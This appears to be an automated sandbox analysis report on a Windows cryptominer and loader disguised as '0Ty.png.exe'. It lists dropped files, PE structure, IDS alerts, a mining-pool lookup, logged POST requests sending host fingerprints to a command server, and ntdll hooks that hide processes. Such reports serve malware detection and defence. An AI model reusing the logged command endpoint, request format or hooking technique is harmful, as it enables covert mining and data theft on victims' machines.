                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_n210etd4.wfa.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_pz5rn0e2.rmc.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_rotsoh1o.0uh.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_yrlvh2tb.wul.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\ihddniqxcjeb.sys

                                                                Download File
                                                                Process:C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):14544
                                                                Entropy (8bit):6.2660301556221185
                                                                Encrypted:false
                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Joe Sandbox View:
                                                                • Filename: Qhx6a6VLAH.exe, Detection: malicious, Browse
                                                                • Filename: 88aext0k.exe, Detection: malicious, Browse
                                                                • Filename: gaozw40v.exe, Detection: malicious, Browse
                                                                • Filename: c2.exe, Detection: malicious, Browse
                                                                • Filename: ldr.ps1, Detection: malicious, Browse
                                                                • Filename: ZppxPm0ASs.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                • Filename: feZvV3DCj8.exe, Detection: malicious, Browse
                                                                • Filename: services64.exe, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Entropy (8bit):6.515282439309424
                                                                TrID:
                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:0Ty.png.exe
                                                                File size:5'457'920 bytes
                                                                MD5:3cae1f11044d2ca787824610a40f1696
                                                                SHA1:bf4af642f36e87b887f973f47a46bcb2e656c636
                                                                SHA256:50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251
                                                                SHA512:0918a7876c39cf901e9a4128f456683d85d2564767600ce4536c9d0bcd4be1b380cad8fcdf6d0b96fd30e48a0f1e73e66df6d5f279fb31e5fe5ecca3e2f856a7
                                                                SSDEEP:98304:iAVs069jHTPkc8zU7Jr93Wu+ieSaCKFa/9hAYNS1gtgghI+lw:iMnUjzPkcyI93Wu+ieSaCKFRYNS1gtV8
                                                                TLSH:A146236833D4A8FCCFE40831DAF67598679220A20F3D75CA47D65E2317E2AD460F62D9
                                                                File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...O.Yg.........."...........R.....@..........@..............................S...........`........................................

                                                                File Icon

                                                                Icon Hash:90cececece8e8eb0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x140001140
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x140000000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6759034F [Wed Dec 11 03:13:19 2024 UTC]
                                                                TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:203d63d5d9a088e2d84cef737227986b

                                                                Entrypoint Preview

                                                                Instruction
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [0000AED5h]
                                                                mov dword ptr [eax], 00000001h
                                                                call 00007F11B0B38E4Fh
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop
                                                                inc ecx
                                                                push edi
                                                                inc ecx
                                                                push esi
                                                                push esi
                                                                push edi
                                                                push ebx
                                                                dec eax
                                                                sub esp, 20h
                                                                dec eax
                                                                mov eax, dword ptr [00000030h]
                                                                dec eax
                                                                mov edi, dword ptr [eax+08h]
                                                                dec eax
                                                                mov esi, dword ptr [0000AEC9h]
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007F11B0B38E70h
                                                                dec eax
                                                                cmp edi, eax
                                                                je 00007F11B0B38E6Bh
                                                                dec esp
                                                                mov esi, dword ptr [0000D1D9h]
                                                                nop word ptr [eax+eax+00000000h]
                                                                mov ecx, 000003E8h
                                                                inc ecx
                                                                call esi
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007F11B0B38E47h
                                                                dec eax
                                                                cmp edi, eax
                                                                jne 00007F11B0B38E29h
                                                                dec eax
                                                                mov edi, dword ptr [0000AE90h]
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007F11B0B38E4Eh
                                                                mov ecx, 0000001Fh
                                                                call 00007F11B0B42D94h
                                                                jmp 00007F11B0B38E69h
                                                                cmp dword ptr [edi], 00000000h
                                                                je 00007F11B0B38E4Bh
                                                                mov byte ptr [00534A81h], 00000001h
                                                                jmp 00007F11B0B38E5Bh
                                                                mov dword ptr [edi], 00000001h
                                                                dec eax
                                                                mov ecx, dword ptr [0000AE7Ah]
                                                                dec eax
                                                                mov edx, dword ptr [0000AE7Bh]
                                                                call 00007F11B0B42D8Bh
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007F11B0B38E5Bh
                                                                dec eax
                                                                mov ecx, dword ptr [0000AE50h]

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xe0980x3c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5380000x18c.pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x53b0000x78.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0xc0a00x28.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc4100x138.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0xe2380x160.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000xa2b60xa40015e6d8e8492bd42c1636b8bdcb03f1d4False0.48323170731707316data6.144150286815596IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0xc0000x282c0x2a00e8f2e2af559520d2a70a0f0df69c0424False0.46726190476190477data4.5977717916125185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xf0000x5286680x526e00dd2d4804696c12a165f918f955ed5774unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .pdata0x5380000x18c0x200d48a4feaa1dad981f0ea34c689c1df39False0.5078125data3.1886506090500264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .00cfg0x5390000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .tls0x53a0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .reloc0x53b0000x780x2001d74cbdd12eb7ad04156a4596b4304abFalse0.234375data1.410823287769429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Imports

                                                                DLLImport
                                                                msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                                KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-25T17:23:00.307417+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.449730194.164.234.17110128TCP
                                                                2024-12-25T17:23:07.931161+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.44973185.209.133.2980TCP
                                                                2024-12-25T17:24:06.527059+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.44975585.209.133.2980TCP
                                                                2024-12-25T17:25:06.831505+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.44977585.209.133.2980TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 25, 2024 17:23:05.858596087 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:23:05.978415966 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:23:05.978503942 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:23:05.978692055 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:23:06.098202944 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:23:06.713646889 CET4973180192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:23:06.839982033 CET804973185.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:23:06.840054989 CET4973180192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:23:06.841140032 CET4973180192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:23:06.961911917 CET804973185.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:23:06.962037086 CET4973180192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:23:07.081746101 CET804973185.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:23:07.241168022 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:23:07.369956970 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:23:07.804949045 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:23:07.931011915 CET804973185.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:23:07.931102037 CET804973185.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:23:07.931160927 CET4973180192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:23:07.931317091 CET4973180192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:23:07.963675022 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:23:08.050889015 CET804973185.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:23:20.319685936 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:23:20.369945049 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:23:50.427695990 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:23:50.479578972 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:23:59.409249067 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:23:59.463773966 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:24:05.155015945 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:05.274676085 CET804975585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:24:05.274776936 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:05.275913000 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:05.395422935 CET804975585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:24:05.395621061 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:05.515213013 CET804975585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:24:06.526787996 CET804975585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:24:06.526885033 CET804975585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:24:06.527059078 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:06.527059078 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:06.775880098 CET804975585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:24:06.776073933 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:06.963799000 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:06.988707066 CET804975585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:24:07.109549046 CET804975585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:24:07.109724998 CET4975580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:24:29.468874931 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:24:29.604448080 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:24:59.543951988 CET1012849730194.164.234.171192.168.2.4
                                                                Dec 25, 2024 17:24:59.604545116 CET4973010128192.168.2.4194.164.234.171
                                                                Dec 25, 2024 17:25:05.546364069 CET4977580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:25:05.736810923 CET804977585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:25:05.740186930 CET4977580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:25:05.740186930 CET4977580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:25:05.860121965 CET804977585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:25:05.864244938 CET4977580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:25:05.983822107 CET804977585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:25:06.831376076 CET804977585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:25:06.831505060 CET4977580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:25:06.831527948 CET804977585.209.133.29192.168.2.4
                                                                Dec 25, 2024 17:25:06.831597090 CET4977580192.168.2.485.209.133.29
                                                                Dec 25, 2024 17:25:06.951209068 CET804977585.209.133.29192.168.2.4

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 25, 2024 17:23:05.638781071 CET5713453192.168.2.41.1.1.1
                                                                Dec 25, 2024 17:23:05.854140997 CET53571341.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 25, 2024 17:23:05.638781071 CET192.168.2.41.1.1.10xf63dStandard query (0)gulf.moneroocean.streamA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 25, 2024 17:23:05.854140997 CET1.1.1.1192.168.2.40xf63dNo error (0)gulf.moneroocean.streammonerooceans.streamCNAME (Canonical name)IN (0x0001)false
                                                                Dec 25, 2024 17:23:05.854140997 CET1.1.1.1192.168.2.40xf63dNo error (0)monerooceans.stream194.164.234.171A (IP address)IN (0x0001)false
                                                                Dec 25, 2024 17:23:15.322381973 CET1.1.1.1192.168.2.40x713cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                Dec 25, 2024 17:23:15.322381973 CET1.1.1.1192.168.2.40x713cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • 85.209.133.29

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.44973185.209.133.29808052C:\Windows\System32\dialer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 25, 2024 17:23:06.841140032 CET180OUTPOST /lowkey/api/endpoint.php HTTP/1.1
                                                                Accept: */*
                                                                Connection: close
                                                                Content-Length: 283
                                                                Content-Type: application/json
                                                                Host: 85.209.133.29
                                                                User-Agent: cpp-httplib/0.12.6
                                                                Dec 25, 2024 17:23:06.962037086 CET283OUTData Raw: 7b 22 69 64 22 3a 22 67 6f 68 6b 66 79 76 71 62 70 6d 65 63 6e 69 64 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 33 37 31 36 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 59 33 38 48 47 37
                                                                Data Ascii: {"id":"gohkfyvqbpmecnid","computername":"123716","username":"SYSTEM","gpu":"Y38HG77BH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System
                                                                Dec 25, 2024 17:23:07.931011915 CET97INHTTP/1.1 404 Not Found
                                                                content-length: 14
                                                                date: Wed, 25 Dec 2024 16:23:07 GMT
                                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                Data Ascii: File not found


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.44975585.209.133.29808052C:\Windows\System32\dialer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 25, 2024 17:24:05.275913000 CET180OUTPOST /lowkey/api/endpoint.php HTTP/1.1
                                                                Accept: */*
                                                                Connection: close
                                                                Content-Length: 505
                                                                Content-Type: application/json
                                                                Host: 85.209.133.29
                                                                User-Agent: cpp-httplib/0.12.6
                                                                Dec 25, 2024 17:24:05.395621061 CET505OUTData Raw: 7b 22 69 64 22 3a 22 67 6f 68 6b 66 79 76 71 62 70 6d 65 63 6e 69 64 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 33 37 31 36 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 59 33 38 48 47 37
                                                                Data Ascii: {"id":"gohkfyvqbpmecnid","computername":"123716","username":"SYSTEM","gpu":"Y38HG77BH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System
                                                                Dec 25, 2024 17:24:06.526787996 CET97INHTTP/1.1 404 Not Found
                                                                content-length: 14
                                                                date: Wed, 25 Dec 2024 16:24:06 GMT
                                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                Data Ascii: File not found


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                2192.168.2.44977585.209.133.2980
                                                                TimestampBytes transferredDirectionData
                                                                Dec 25, 2024 17:25:05.740186930 CET180OUTPOST /lowkey/api/endpoint.php HTTP/1.1
                                                                Accept: */*
                                                                Connection: close
                                                                Content-Length: 491
                                                                Content-Type: application/json
                                                                Host: 85.209.133.29
                                                                User-Agent: cpp-httplib/0.12.6
                                                                Dec 25, 2024 17:25:05.864244938 CET491OUTData Raw: 7b 22 69 64 22 3a 22 67 6f 68 6b 66 79 76 71 62 70 6d 65 63 6e 69 64 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 33 37 31 36 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 59 33 38 48 47 37
                                                                Data Ascii: {"id":"gohkfyvqbpmecnid","computername":"123716","username":"SYSTEM","gpu":"Y38HG77BH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System
                                                                Dec 25, 2024 17:25:06.831376076 CET97INHTTP/1.1 404 Not Found
                                                                content-length: 14
                                                                date: Wed, 25 Dec 2024 16:25:06 GMT
                                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                                Data Ascii: File not found


                                                                Code Manipulations

                                                                User Modules

                                                                Hook Summary

                                                                Function NameHook TypeActive in Processes
                                                                ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                                Processes

                                                                Process: explorer.exe, Module: ntdll.dll
                                                                Function NameHook TypeNew Data
                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                Process: winlogon.exe, Module: ntdll.dll
                                                                Function NameHook TypeNew Data
                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
